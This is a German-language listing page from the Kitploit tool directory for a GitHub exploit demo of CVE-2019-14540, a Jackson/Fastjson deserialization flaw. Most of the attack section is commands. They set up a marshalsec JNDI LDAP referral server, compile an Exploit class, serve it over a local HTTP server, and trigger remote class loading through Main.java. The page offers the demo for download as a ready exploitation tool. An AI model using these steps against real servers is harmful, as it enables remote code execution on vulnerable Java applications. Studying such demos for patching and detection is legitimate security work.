Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2019-14540-exploit — CVE-2019-14540 Exploit | Kitploit
Tools/GitHubGitHub/leadroyal/cve-2019-14540-exploit
Dynamic Analysis (Sandboxing)Payload GenerationVulnerability AnalysisExploitationWeb Application Exploitation
GitHubleadroyal/cve-2019-14540-exploit

cve-2019-14540-exploit

CVE-2019-14540 Exploit

Repository anzeigen
219vor 7 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-14540 Exploit

http://www.leadroyal.cn/?p=939

Umgebungseinschränkung: Da dieses Demo die jndi ldap-Methode verwendet, wird eine niedrige JDK-Version (kleiner als 8u191) benötigt.

1. Verwendung von marshalsec, um einen ldap-Dienst auf dem lokalen Port 1389 zu erstellen, der auf den lokalen HTTP-Dienst auf Port 8000 verweist

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
mvn package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 1389

2. Kompilieren des Codes für den Remote-Ladevorgang im remote_codebase-Verzeichnis

root@kitploit:~
cd remote_codebase
javac Exploit.java

3. Starten des lokalen HTTP-Dienstes auf Port 8000 im remote_codebase-Verzeichnis

root@kitploit:~
cd remote_codebase
python -m SimpleHTTPServer

4. Ausführen von Main.java, um die Sicherheitslücke mittels Jackson- und Fastjson-Deserialisierung auszulösen

demo.png

Tool herunterladen